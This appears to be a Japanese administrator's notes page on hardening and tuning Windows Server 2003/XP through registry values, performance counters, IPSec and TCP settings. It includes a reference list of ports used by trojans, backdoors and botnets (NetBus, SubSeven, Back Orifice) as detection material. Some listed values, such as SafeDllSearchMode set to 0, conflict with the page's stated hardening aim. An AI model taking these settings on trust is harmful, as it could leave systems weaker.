ユーザー定義の値 設定可能な値は 0 から 0xFFFFFFFF ■PerformRouterDiscovery HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : PerformRouterDiscovery データ型 : REG_DWORD 値 : 0 [0]: [無効] 1 : [有効] ■TCPMaxPortsExhausted HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters 値の名前 : TCPMaxPortsExhausted データ型 : REG_DWORD 値 : 5 [5] : ユーザー定義の値 設定可能な値は 0 から 0xFFFF AFD.SYS の設定 ■DynamicBacklogGrowthDelta HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters 値の名前 : DynamicBacklogGrowthDelta データ型 : REG_DWORD 値 : 10 [0] : ユーザー定義の値 設定可能な値は 0 から 0xFFFFFFFF ■EnableDynamicBacklog HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters 値の名前 : EnableDynamicBacklog データ型 : REG_DWORD 値 : 1 1 : [有効] [0]: [無効] ■MinimumDynamicBacklog HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters 値の名前 : MinimumDynamicBacklog データ型 : REG_DWORD 値 : 20 [0] : ユーザー定義の値 設定可能な値は 0 から 0xFFFFFFFF ■MaximumDynamicBacklog HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters 値の名前 : MaximumDynamicBacklog データ型 : REG_DWORD 値 : 20000 10000: [10000] 15000: [15000] 20000: [20000 (recommended)] 40000: [40000] 80000: [80000] 160000: [160000] 設定可能な値は 1 から 0xFFFFFFFF 既定値は 0 ■Configure NetBIOS Name Release Security HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Netbt\Parameters 値の名前 : NoNameReleaseOnDemand データ型 : REG_DWORD 値 : 1 [1]: [有効] 0 : [無効] ■Disable Auto Generation of 8.3 File Names HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem 値の名前 : NtfsDisable8dot3NameCreation データ型 : REG_DWORD 値 : 1 1 : [有効] [0]: [無効] ■Disable Autorun HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer 値の名前 : NoDriveTypeAutoRun データ型 : REG_DWORD 値 : 0xFF [0]: [無効] [Null, allow Autorun] 255: [有効] [255, disable Autorun for all drives] HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\ 値の名前 : AutoRun データ型 : REG_DWORD 値 : 0 1 : [有効] [0]: [無効]   ※無効化していても、エクスプローラから開いた時に自動実行させる事が可能なので効果は薄い。    http://blog.trendmicro.co.jp/archives/3527 ■Make Screensaver Password Protection Immediate HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 値の名前 : ScreenSaverGracePeriod データ型 : REG_String 値 : 0 [5] : ユーザー定義の値 設定可能な値は 0 から 255(秒) ■Security Log Near Capacity Warning HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security 値の名前 : WarningLevel データ型 : REG_DWORD 値 : 0 設定可能な値は 0 から 100 既定値は 0 (警告イベントが生成されない) ■Enable Safe DLL Search Order HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager 値の名前 : SafeDllSearchMode データ型 : REG_DWORD 値 : 0 1 : [有効] [0]: [無効] 参考 脅威とその対策 - Windows Server 2003 と Windows XP のセキュリティ設定 追加のレジストリ設定 に書かれている定義をそのまま貼り付けるとハマるので注意。 ※レジストリに上記キーを追加すれば個別で機能します。 第 5 章 - セキュリティの構成 Windows Server 2003 をセキュリティ保護する 上記対策を施してあれば Windows XP SP2とServer 2003,“古典的な攻撃”の影響を受けることが明らかに は防げるようです。 [HOWTO] Windows Server 2003 で DoS 攻撃に対して TCP/IP スタックを強化する方法 ドメインコントローラに登録すれば、ポリシーの設定で一括反映されます。 アレンジすれば、好きな設定を追加出来そうですね。 試しに追加 [Register Registry Values] に追加 ;========================= カスタムセキュリティ Values ========================== MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network\DisablePwdCaching,4,%DisablePwdCaching%,0 MACHINE\System\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate,4,%NtfsDisableLastAccessUpdate%,0 MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash,4,%NoLMHash%,0 MACHINE\System\CurrentControlSet\Control\Lsa\DisableDomainCreds,4,%DisableDomainCreds%,0 MACHINE\System\CurrentControlSet\Control\WaitToKillServiceTimeout,1,%WaitToKillServiceTimeout%,3,5000|%WaitToKillServiceTimeout1%,20000|%WaitToKillServiceTimeout2%,120000|%WaitToKillServiceTimeout3% MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\Hidden,4,%ServerHidden%,0 MACHINE\System\CurrentControlSet\Services\lanmanserver\parameters\Size,4,%MemorySize%,3,1|%MemorySize0%,2|%MemorySize1%,3|%MemorySize2% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPorts,4,%MaxUserPorts%,3,5000|%MaxUserPorts0%,10000|%MaxUserPorts1%,20000|%MaxUserPorts2%,50000|%MaxUserPorts3% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpTimedWaitDelay,4,%TcpTimedWaitDelay%,3,240|%TcpTimedWaitDelay0%,10|%TcpTimedWaitDelay1%,30|%TcpTimedWaitDelay2%,60|%TcpTimedWaitDelay3% MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\IPAutoconfigurationEnabled,4,%IPAutoconfigurationEnabled%,0 MACHINE\System\CurrentControlSet\Control\Lsa\Kerberos\Parameters\LogLevel,4,%KerberosLog%,0 MACHINE\System\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect,4,%WriteProtect%,0 [Strings] に追加 ;================================ カスタムセキュリティ Settings =========================== ServerHidden = "カスタム セキュリティ: ネットワークコンピュータからコンピュータを隠す" NtfsDisableLastAccessUpdate = "カスタム セキュリティ: ファイルやフォルダの最終アクセス時刻の記録をしない" NoLMHash = "カスタム セキュリティ: LM ハッシュの作成を無効化する" DisablePwdCaching = "カスタム セキュリティ: パスワード保存機能を無効にする" DisableDomainCreds = "カスタム セキュリティ: ドメイン(.NET)パスワード保存機能を無効にする" MemorySize = "カスタム セキュリティ: Server サービスが利用するメモリー量やネットワーク速度の調整" MemorySize0 = "メモリーの使用を最小化" MemorySize1 = "バランスを取る" MemorySize2 = "ネットワーク帯域の使用を最大化する" WaitToKillServiceTimeout = "カスタム セキュリティ: シャットダウンの待ち時間(単位はミリ秒)" WaitToKillServiceTimeout1 = "5000ミリ秒" WaitToKillServiceTimeout2 = "20000ミリ秒(デフォルト)" WaitToKillServiceTimeout3 = "120000ミリ秒" MaxUserPorts = "カスタム セキュリティ: ユーザーアクセス可能な一時ポートの数を調整" MaxUserPorts0 = "5000(デフォルト)" MaxUserPorts1 = "10000" MaxUserPorts2 = "20000" MaxUserPorts3 = "50000" TcpTimedWaitDelay = "カスタム セキュリティ: TIME_WAIT 状態で待機する時間を調整" TcpTimedWaitDelay0 = 240秒(デフォルト) TcpTimedWaitDelay1 = 10秒 TcpTimedWaitDelay2 = 30秒 TcpTimedWaitDelay3 = 60秒 IPAutoconfigurationEnabled = "カスタム セキュリティ: APIPA を有効にする" KerberosLog = "特定のコンピュータにログオンしている Kerberos イベントを有効にする" WriteProtect = "カスタム セキュリティ: USB 外付けストレージへの書き込み禁止する" ■サーバアナウンスメントをさせない(ネットワークコンピュータの中に表示させない) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 値の名前 : Hidden データ型 : REG_DWORD 値 : 0 1 : [有効] 隠す [0]: [無効] 隠さない (デフォルト)    コマンドコンソールから net config server /hidden:yes でも 設定可能です。    この後,net config コマンドで "隠しサーバー" が "Yes" になっていることを確認してリブートする。    しかし、このコマンド操作を行うとサーバーサービス のプロパティからの変更処理が効かなくなる    Server サービスの構成および調整    が確認されているのでレジストリを直接操作した方が安全です。   ■ファイルやフォルダの最終アクセス時刻の記録   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem   値の名前 : NtfsDisableLastAccessUpdate   値の型 : REG_DWORD   値 : 1(登録しない)   ■LM ハッシュの作成を無効化する   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\   値の名前 : NoLMHash   データ型 : REG_DWORD   値 : 1    Windows でパスワードの LAN Manger ハッシュが Active Directory とローカル SAM データベースに保存されないようにする方法    http://support.microsoft.com/kb/299656/ja    LanManHash 用 RainbowTable の作成    http://www.insi.co.jp/news/20060529-news.html    Windows認証を数秒で解析脆弱なパスワードは即座に破られる    http://itpro.nikkeibp.co.jp/members/NBY/ITARTICLE/20040601/1/   ■パスワード保存機能の無効化   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network   値の名前 : DisablePwdCaching   データ型 : REG_DWORD   値    : 0:キャッシュ有効、1:キャッシュ無効   ■Serverサービスが利用するメモリー量やネットワーク速度を調整   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters   値の名前 : Size   データ型 : REG_DWORD   値    : 1 1:メモリーの使用を最小化する場合 2:バランスを取る場合 3:ネットワーク帯域の使用を最大化する場合   Server の場合は[ローカルエリア接続]の[Microsoftネットワーク用ファイルとプリンタ共有]で設定可能   ちなみに SQL Server をインストールすると、「ネットワーク帯域の使用を最大化する場合」に変わります。   http://msdn2.microsoft.com/ja-jp/library/ms191471.aspx   ■シャットダウンの待ち時間を調整   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control   値の名前 : WaitToKillServiceTimeout   データ型 : REG_SZ   値    : 20000   ■使用できるポートの数を増やす   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters   値の名前 : MaxUserPorts   データ型 : REG_DWORD   値    : 5000   ■TIME_WAIT 状態で待機する時間の長さを指定   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters   値の名前 : TcpTimedWaitDelay   データ型 : REG_DWORD   値    : デフォルト 240 秒   ■APIPA の利用   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters   値の名前 : IPAutoconfigurationEnabled   データ型 : DWORD   値    : 無効:0、有効:1   http://www.atmarkit.co.jp/fpc/pctips/019disableapipa2k/disableapipa2k.html   ■Kerberos イベント ログを有効にする   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters   値の名前 : LogLevel   データ型 : REG_DWORD   値    : 無効:0、有効:1   http://support.microsoft.com/kb/262177/  その他はこの辺りで。   [HOWTO] TCP/IP スタックを強化する方法   http://www.microsoft.com/japan/msdn/security/guidance/secmod109.mspx   グループ ポリシーを使用して、MaxTokenSize レジストリ エントリを複数のコンピューターに追加する方法   http://support.microsoft.com/kb/938118 ↓これは未チェック MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareWks,4,%AutoShareWks%,0 MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,4,%AutoShareServer%,0 AutoShareWks = "カスタム セキュリティ: 管理共有を無効化(クライアント)" ServerHidden = "カスタム セキュリティ: 管理共有を無効化(サーバー)" ■管理者共有(クライアント) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 値の名前 : AutoShareWks データ型 : REG_DWORD 値 : 0 1 : [有効] 共有作成(デフォルト) [0]: [無効] 共有削除 ■管理者共有(サーバー) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters   値の名前  : AutoShareServer(サーバー OS の場合) データ型 : REG_DWORD 値 : 0 1 : [有効] 共有作成(デフォルト) [0]: [無効] 共有削除
パフォーマンスモニタを利用してサーバを監視する。(管理ツールの中にあります) 不正アクセス感知として Server ・Errors Access Permissions  ファイルのオープンが失敗し、STATUS_ACCESS_DENIED が出された回数 ・Errors Granted Access  ファイルへのアクセスが拒否された回数 ・Errors Logon ログオンに失敗した回数 Web Service ・Total Copy Requests/Total Delete Requests サービスが開始されてから数えられた、COPY メソッドを使用した HTTP 要求の数 ・Total Head Requests サービスが開始されてから数えられた、HEAD メソッドを使用した HTTP 要求の数 ・Logon Attempts/sec Logon Attempts/sec は Web サービスを使用してログオンが試行される比率 Active Server Pages ・Request Failed Total エラー、証明エラー、拒否により失敗した要求の数 ・Request Queued キューからのサービスを待っている要求の数  KB: 300237 [HOW TO] コンピュータ リソースの不足を通知するように Windows 2000 Server を構成する方法  http://support.microsoft.com/kb/300237  マイクロソフトの Securing Windows 2000 Server ソリューション  第 9 章 ‐ 監査と侵入検出  http://www.microsoft.com/japan/technet/security/prodtech/windows2000/secwin2k/09detect.mspx 使いこなすには、正常稼動時のサンプルをベースラインを作成し、そこから警告値を設定しておく。 こなへん  PC の基礎 入出力、プロセッサ、およびメモリ  http://www.microsoft.com/japan/whdc/system/cec/default.mspx  ネットワーク管理運用ガイド  http://www.microsoft.com/japan/technet/prodtechnol/windows2000serv/maintain/opsguide/netadmog.mspx  管理ツールと管理機能を使用する  http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/strategies_and_tools.asp  ハードウェア パフォーマンスの監視とチューニングを行う  http://www.microsoft.com/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/perf_mon_hardware.asp  パフォーマンスの問題を解決する  http://www.microsoft.com/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/SAG_MPmonperf_28.asp  パフォーマンス データを分析する  http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/ServerHelp/f317ba77-45f0-44a3-986a-13299572226e.mspx?mfr=true  Windows Server 2003 のパフォーマンス チューニング ガイドライン  http://download.microsoft.com/download/6/6/8/668b964f-f126-4a96-88db-25d842a7113f/tuning.doc  Windows Server 2008 のパフォーマンス チューニングに関するガイドライン  http://www.microsoft.com/japan/whdc/system/sysperf/Perf_tun_srv.mspx  Windows Server 2008 R2 のパフォーマンス チューニングに関するガイドライン  http://www.microsoft.com/japan/whdc/system/sysperf/Perf_tun_srv-R2.mspx  サーバーのパフォーマンスの最適化  http://msdn2.microsoft.com/ja-jp/library/ms188284.aspx  SQL Server 2000 管理者用ポケット コンサルタント 第 10 章 ‐ プロファイリングと監視  http://www.microsoft.com/japan/technet/prodtechnol/sql/2000/books/c10ppcsq.mspx  64 ビット版の Windows Server 2003 または Windows XP の適切なページング ファイル サイズを決定する方法  http://support.microsoft.com/kb/889654/ja  パフォーマンス・モニタの使い方(基本編)  http://www.atmarkit.co.jp/fwin2k/win2ktips/1229perfmon/perfmon.html  Windows 7 と Windows サーバー 2008 R2 のパフォーマンスの問題を診断する方法  http://support.microsoft.com/kb/2669922  
メモリリークを引き起こす該当コンポーネントを調査・特定する  サポートツールに含まれる「Memory Pool Monitor(Poolmon)」を利用。  Debugging Tools for Windows に「Pooltag.txt」が含まれているので、これも利用し以下のコマンドを叩く。    POOLMON -g "c:\program files\Debugging Tools for Windows\triage\pooltag.txt" -p -d   ※Memory Pool Monitor の出力はコマンドプロンプトのデフォルトでは収まりきらないのでプロパティから    画面バッファサイズとフォントサイズを調整して画面サイズ内に全ての表示が収まるようにする。  確認するのは、「Diff」「Bytes」列の数値。  「Diff」列は「Allocs」列と「Frees」列の差であり、コンポーネントが行なったメモリ割り当てのうち  開放されていない割り当て数を示す。  この数値が時間とともに増加する場合は、そのコンポーネントでメモリリークが発生している可能性がある。  「Bytes」列は、現在割り当てられているメモリ量を示す。  この列の値が時間とともに増加する場合も、そのコンポーネントでメモリリークが発生している可能性を示している。   Memory Pool Monitor (Poolmon.exe) を使用して   カーネル モードのメモリ リークのトラブルシューティングを行う方法   http://support.microsoft.com/kb/177415   メモリのアクセスおよび割り当てのエラーに関するテスト   http://www.microsoft.com/japan/whdc/driver/security/mem-alloc_tst.mspx   Process Explorer   http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx   「Strings」タブは日本語文字コードに対応してませんが、これも役に立つでしょう。
サービス リクエスト SR シートのダウンロード
Windows XP Service Pack 2 で MSN Messenger を使用しているときに IME (Input Method Editor) を使用できない http://support.microsoft.com/default.aspx?scid=kb;ja;890831 にパッチが公開されています。
Windows Server 2003 で 「system error ID 1003」が出る場合の対策 以下ページを参考に パッチを手に入れ適応する事で解決するかも。。。 Windows Server 2003 ベースのコンピュータを再起動するとエラー メッセージ "Serious system error" が表示され、イベント ID 1003 が記録される
Outlook Express 6 の [ツール] メニューにある [Windows Messenger] を非表示に設定 レジストリで以下の値を追加 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express 値の名前 : Hide Messenger データ型 : DWORD 値    : 2 Windows Messenger を無効にすると、Outlook Express で DCOM エラーが発生する場合がある Windows XP ベースのコンピュータで Windows Messenger が実行されないようにする方法
トロイの木馬でよく使用されるポート TCP/21 WinCrash, Back Construction TCP/23 telnet TCP/25 Ajan, Email Password Sender Happy99 TCP/31 Agent31, Masters Paradise TCP/41 Deep Throat TCP/59 DMSetup TCP/80 Eecuter TCP/99 Hidden Port TCP/113 Kiazimas TCP/119 Happy99 TCP/121 BO jammerkillah TCP/456 Hackers Paradise TCP/531 Rasmin TCP/555 Phase Zero, Stealth Spy TCP/666 Back Construction, Attack FTP TCP/911 Dark Shadow TCP/999 Deep Throat TCP/1001 Silencer, WebEx TCP/1010 Doly TCP/1011 Doly TCP/1012 Doly TCP/1015 Doly TCP/1024 NetSpy TCP/1033 NetSpy TCP/1042 Bla TCP/1047 CateCrasher TCP/1090 Xtreme TCP/1170 Streaming Audio Torojan, Psyber Stream Server TCP/1234 Ultors TCP/1243 BackDoor-G, SubSeven TCP/1245 VooDoo Doll TCP/1269 Maverick's Matrix TCP/1492 BackOrifice FTP, FTP99 TCP/1509 Psyber Streaming Server TCP/1600 Shvka Burka TCP/1807 SpySender TCP/1981 ShockRave TCP/1999 Trojan Scout TCP/2000 Trojan Scout TCP/2001 Trojan Cow TCP/2002 Trojan Scout TCP/2003 Trojan Scout TCP/2004 Trojan Scout TCP/2005 Trojan Scout TCP/2023 Pass Ripper TCP/2115 Bugs TCP/2140 Deep Throat TCP/2155 Illusion Mailer TCP/2283 HVL Rat5 TCP/2565 Striker TCP/2583 Wincrash TCP/2801 Phineas Phucke UDP/2989 RAT TCP/3129 Master Paradise TCP/3150 Deep Throat TCP/3459 Eclips2000 UDP/3801 Eclips TCP/4321 BoBo TCP/4567 FileNail TCP/4950 ICQ Trojan TCP/5000 Bubbel, Blazer TCP/5001 BackDoor Server TCP/5011 OOTLT TCP/5031 NetMetro TCP/5321 Filehotcker TCP/5400 Blade Runner, Back Construction TCP/5401 Blade Runner, Back Construction TCP/5402 Blade Runner, Back Construction TCP/5512 Illusion Mailer TCP/5550 Xtcp TCP/5555 ServeMe TCP/5556 BO Facil TCP/5557 BO Facil TCP/5569 RoboHack TCP/5714 Wincrash3 TCP/5742 Wincrash TCP/6400 The Thing TCP/6669 Vampire TCP/6670 Deep Throat TCP/6671 Deep Throat TCP/6767 NT Remote Control TCP/6776 SubSeven, BackDoor-G TCP/6883 DeltaSource TCP/6912 Shit Heep TCP/6939 Indoctrination TCP/6969 GateCrasher TCP/6970 GateCrasher TCP/7000 Remote Grab TCP/7300 NetMonitor TCP/7301 NetMonitor TCP/7306 NetMonitor TCP/7306 NetMonitor TCP/7307 NetMonitor TCP/7308 NetMonitor TCP/7789 ICQ Killer TCP/8080 RingZero TCP/9400 InCommand TCP/9872 Portal Of Doom TCP/9873 Portal Of Doom TCP/9874 Portal Of Doom TCP/9875 Portal Of Doom TCP/9876 Cyber Attacker TCP/9878 TransScout TCP/9989 iNi-Killer UDP/10067 Portal Of Doom TCP/10101 BrainSpy UDP/10167 Portal Of Doom TCP/11000 Senna Spy Trojan TCP/11223 Progenic Trojan TCP/12076 Gjamer TCP/12223 Hack99 KeyLogger TCP/12345 NetBus TCP/12346 NetBus TCP/12631 WhackJob TCP/13000 SennaSpy TCP/16969 Priority TCP/17300 Kuang2 TCP/20000 Millenium2 TCP/20001 Millenium2 TCP/20034 NetBus2 TCP/20203 Loged TCP/20331 Bla TCP/21554 GirlFriend TCP/22222 Schwindler TCP/23476 Donald Dick TCP/23477 Donald Dick TCP/23456 Whack Job, Evil FTP UDP/26274 Delta Source TCP/29891 The Unexplained UDP/29891 The Unexplained TCP/30029 AOL Trojan TCP/30101 NetSphere TCP/30102 NetSphere TCP/30100 NetSphere TCP/30303 Socket23 TCP/30999 Kuang2 TCP/31336 BO Whack UDP/31337 BackOrifice UDP/31338 BackOrifice TCP/31339 NetSpy TCP/31666 Whackmole UDP/31789 Hack a tack UDP/31791 Hack a tack TCP/32771 Solaris rcpbind vulnerability TCP/33333 Prosiak TCP/33911 Trojan Spirit TCP/34324 TN TCP/34324 Tiny Telnet Server TCP/40412 The Spy TCP/40421 Master Paradise TCP/40423 Master Paradise UDP/47262 Delta Source TCP/50766 Fore TCP/53001 Remote Shutdown UDP/54321 Back Orifice 2000 小規模サイト管理者向けセキュリティ対策マニュアル(IPA) http://www.ipa.go.jp/security/fy12/contents/crack/soho/soho/ Botnet でよく使われるポート TCP/42 WINS (Host Name Server) TCP/80 www TCP/903 NetDevil Backdoor TCP/1025 Microsoft Remote Procedure Call (RPC) service and Windows Messenger port TCP/1433 ms-sql-s (Microsoft-SQL-Server) TCP/2745 backdoor of Bagle worm TCP/3127 backdoor of MyDoom worm TCP/3306 MySQL UDF Weakness TCP/3410 vulnerability in Optix Pro remote access trojan TCP/5000 upnp(Universal Plug and Play: MS01-059 参照) TCP/6129 dameware(Dameware Remote Admin) 閉じるべき基本ポート TCP/135 Microsoft to implement Remote Procedure Call UDP/137 NetBIOS Name Service TCP/139 NetBIOS Session Service TCP/445 Microsoft-DS Service NetBIOS が使用するポート  UDP/137  UDP/138  TCP/139 SMB が使用するポート  TCP/139  TCP/445 インターネットからアクセス可能なサーバは 「ローカル エリア接続」から 「TCP/IP のプロパティ」を開き  ・Microsoft ネットワーク用ファイルとプリンタ共有  ・Microsoft ネットワーク用クライアント を削除して SMB を無効にし、 さらに NetBIOS over TCP/IP を無効にする事。  [マイ コンピュータ] を右クリックし、[管理] を選択。  [システム ツール]>[デバイス マネージャ]>[デバイス マネージャ] を右クリック  [表示]を選択し、[非表示のデバイスの表示]をクリック  [プラグ アンド プレイではないドライバ] を展開し、[NetBios over Tcpip] を右クリック  [無効] をクリック。  ※「ローカル エリア接続」の「TCP/IP のプロパティ」にある [WINS] タブに   [NetBIOS over TCP/IP を無効にする] オプションがありまが、このオプションを選択しても   TCP ポート 139 上でリッスンする NetBIOS セッション サービスが無効になるだけです。   SMB が完全に無効になるわけではありません。   詳しくは    マイクロソフトの Securing Windows 2000 Server ソリューション 付録 D ‐ 信頼されていないネットワーク内にあるサーバーでの NetBIOS の無効化 ポートの情報に PORT NUMBERS http://isc.sans.org/ インターネット定期観測(@police) Weekly SOC Report(ISS) 最近やたらと、TCP/5617 へのアクセスが多い気がするんだけど何?
IPSec IPSec (インターネット プロトコル セキュリティ) [IP セキュリティ モニタ] スナップインを追加するには [HOWTO] Windows Server 2003 で IPSec トンネリングを構成する方法 The Cable Guy - 2005年2月 IPsec のフィルタの順序 Windows Server 2003 をセキュリティ保護する Windows 2000 で IPSec の IP フィルタ一覧を使用する方法 Windows 2000 および Windows XP の IPSec および L2TP の実装 Windows XP での L2TP/IPSec の基本的なトラブルシューティング  IPsec にフィルタに対する既定の除外の指定方法 (Windows 2003) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPSEC 値の名前 : NoDefaultExempt データ型 : REG_DWORD 値 : 0 〜 3    0: マルチキャスト、ブロードキャスト、RSVP、Kerberos、ISAKMP トラフィックを除外 (2000、XP 既定のフィルタ動作)    1: マルチキャスト、ブロードキャスト、ISAKMP トラフィックを除外    2: RSVP、Kerberos、ISAKMP トラフィックを除外    3: ISAKMP トラフィックを除外 (2003 既定のフィルタ動作)    ※ 設定は netsh ipsec dynamic set config ipsecexempt value=<値> で可能    詳しくはリソースキット 導入編2の 274 ページを参照   Windows Server 2003 で、2048 ビット Diffie-Hellman アルゴリズムを使用する   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters 値の名前 : NegotiateDH2048 データ型 : REG_DWORD 値 : 1   詳しくはWindows XP および Windows 2000 用 L2TP/IPSec NAT-T 更新プログラム その他。  グループポリシーの更新  Windows 2000 コマンドプロンプトで「secedit.exe /refreshpolicy machine_policy」確認は「secmon.exe」 Windows XP/2003 コマンドプロンプトで「gpupdate.exe」確認は「mmc.exe」でIPセキュリティモニタを追加。
NIC に割り当てられた IP アドレス(ゴーストデバイス)を消す方法  このネットワーク アダブタ用に有力された IP アドレス 192.168.0.1 は 別のアダプタ 'xxx PCI Gigabit Controller' に既に割当てられています。  'xxx PCI Gigabit Controller' は物理的にコンピュータにないか動作していないレガシ アダプタであるため、ネットワーク接続フォルダには表示されません。  同じアドレスが割当てられた 2 つのアダプタがアクティブになった場合、どちらか 1 つのアダプタがそのアドレスを使うことになり、システム構成エラーの原因となります。  ※ LAN カードが故障し交換した場合など、新しいアダプタに 以前と同じ IP アドレスを振った場合のメッセージ (1) コマンドプロンプトを起動します。 ・[スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。 ・cmd.exe と入力して Enter キーを押します。 (2) ゴーストデバイスを含む " 非表示のデバイス " を表示する設定を行います。 ・コマンドプロンプトで ' set devmgr_show_nonpresent_devices=1 ' を実行します。 (3) デバイスマネージャを開きます。 ・コマンドプロンプトで ' Start DEVMGMT.MSC ' を実行します。 (4) デバイスマネージャで、[ 非表示デバイスの表示 ] を選択します。 (5) ネットワーク アダプタ ツリーに削除したいオンボード NIC がグレー表示されていることをご確認下さい。 (6) 削除したいオンボード NIC を削除します。 詳しくは ネットワーク アダプタに IP アドレスを設定する際のエラー メッセージ 参考 トラブルシューティング "The registry subkey already exists" というメッセージが表示されます。 Windows Server 2003 と Windows XP でネットワーク接続アイコンがなくなる問題をトラブルシュートする方法 Windows Server 2003 で "インターネット プロトコル (TCP/IP)" をリセットする方法 デバイスのプロパティさわりまくったら、速度が出なくなった。 という事でリセット  Windows XP や Windows Server 2003 で TCP/IP のパラメータをリセットするにはコマンドで   netsh interface ip reset <ログファイル名>
広帯域幅ネットワークの使用効率を高める   TCP ウインドウ サイズ(接続中に一度にバッファに格納できる受信データの量 (バイト数))の調整   受信ウィンドウ サイズは次の方法で決定される    1. リモート ホストに最初に送信される接続要求では、受信ウィンドウ サイズが 16 KB (16,384 バイト) と通知されます。    2. 接続が確立されると、受信ウィンドウのサイズは、MSS の倍数値になるように切り上げられます。    3. ウィンドウ サイズは、MSS の 4 倍に調整されます。ウィンドウ スケーリング オプション (RFC 1323) が有効でない限り、最大サイズは 64 KB です。 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters (Windows 2003) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces (Windows 2000) 値の名前 : TcpWindowSize データ型 : REG_DWORD 値 : 0 〜 0x3FFFC000 (16 進数) ※ TcpWindowSize を Parameters キーに追加すると、すべてのインターフェイスのウィンドウ サイズをグローバルに設定することもできる。   この値は、デフォルトでは存在しません。TcpWindowSize 値を追加すると、上で説明したデフォルトのウィンドウ サイズのアルゴリズムより優先されます。    TCPWindowSize の値を変更してもデフォルトの TCP ウィンドウ サイズが使用され続ける    Windows 2000 で TCP 受信ウィンドウのデフォルトのサイズを SP3 以前のデフォルトのサイズ 17,520 バイトに戻すセキュリティ更新プログラム 893066    VISTA は自動調整されるので、無効化する場合は以下のコマンドを実行    (VISTA で見れないサイトがある場合等に)    netsh interface tcp set global autotuninglevel=disabled    戻す場合は    netsh interface tcp set global autotuninglevel=normal ちなみに autoTuningLevel で利用可能なオプションは ・disabled ・highlyrestricted <Vista 以降はこの設定が速度が出るようです。 ・restricted ・normal ・experimental 詳しくは KB934430 http://support.microsoft.com/kb/934430/ KB929868 http://support.microsoft.com/kb/929868/ KB935400 http://support.microsoft.com/kb/935400/    TCP 受信ウィンドウ自動チューニング    http://www.microsoft.com.nsatc.net/technet/technetmag/issues/2007/01/CableGuy/default.aspx?loc=jp    Windows Vista ベースのコンピュータとそれ以前のオペレーティング システムの間で、サイズの大きいファイルをコピーすると、予想よりもコピー操作に時間がかかることがある    http://support.microsoft.com/kb/932170/    Windows Vista で特定のルーターやマイクロソフト製以外の特定の DHCP サーバーから IP アドレスを取得できない    http://support.microsoft.com/kb/928233/     Windows VistaでDHCPサーバからIPアドレスが取得できない不具合を解消する     http://www.atmarkit.co.jp/fwin2k/win2ktips/1295dhcpflag/dhcpflag.html    MTU は 576 の下にあると、Windows 7 SP1 または Windows Server 2008 R2 SP1 で PMTU 検出が有効でパケット損失が発生します。    http://support.microsoft.com/kb/2896146/ja    Copy process is very slow when you copy large files from one computer to another computer in a high-bandwidth network environment if both computers are running either Windows Vista or Windows Sever 2008    http://support.microsoft.com/kb/955427/     TCPの再送処理の挙動が変、TCP受信ウィンドウを広げれない。    RWINを自動で調整するようになった    http://ascii.jp/elem/000/000/106/106192/    ローカルネットワークでファイルのコピーが遅い場合のフラグメントの調べ方。    ネットワークインターフェースの MTU を確認    C:\>netsh interface ipv4 show interfaces    Idx Met MTU 状態 